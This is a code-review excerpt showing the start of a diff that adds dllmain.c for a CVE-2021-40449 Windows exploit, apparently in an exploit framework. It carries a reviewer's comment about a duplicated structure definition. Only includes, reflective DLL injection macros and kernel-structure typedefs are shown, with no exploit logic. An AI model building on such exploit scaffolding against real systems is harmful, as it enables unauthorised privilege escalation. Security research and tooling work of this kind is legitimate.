external/source/exploits/CVE-2021-40449/CVE-2021-40449/dllmain.c

```diff
@@ -0,0 +1,684 @@
+#pragma warning( disable : 4005 )
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "ReflectiveLoader.c"
+#include <stdio.h>
+#include <winddi.h>
+#include <Windows.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+#include <winspool.h>
+#include "../../include/windows/common.h"
+
+#define SystemHandleInformation         0x10
+#define SystemBigPoolInformation        0x42
+#define ThreadNameInformation           0x26
+
+// Manually define a whole bunch of structures with definitions from winternl.h vs importing winternl.h cause our ReflectiveLoader.h 
+// decided it would be a bright idea to define only some of these manually, thus causing any other program that wants to load anything 
+// that this defines to cause compilation errors, even if its trying to override the definition with more correct info or more definitions.
+typedef enum _THREADINFOCLASS {
+    ThreadIsIoPending = 16
+} THREADINFOCLASS;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+    SystemBasicInformation = 0,
+    SystemPerformanceInformation = 2,
+    SystemTimeOfDayInformation = 3,
+    SystemProcessInformation = 5,
+    SystemProcessorPerformanceInformation = 8,
+    SystemInterruptInformation = 23,
+    SystemExceptionInformation = 33,
+    SystemRegistryQuotaInformation = 37,
+    SystemLookasideInformation = 45,
+    SystemCodeIntegrityInformation = 103,
+    SystemPolicyInformation = 134,
+} SYSTEM_INFORMATION_CLASS;
+
+typedef struct _DriverHook
+{
+    ULONG index;
+    LPVOID func;
+} DriverHook;
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO

```

Comment:
This is also defined already in `external/source/include/windows/definitions.h` where you can include it.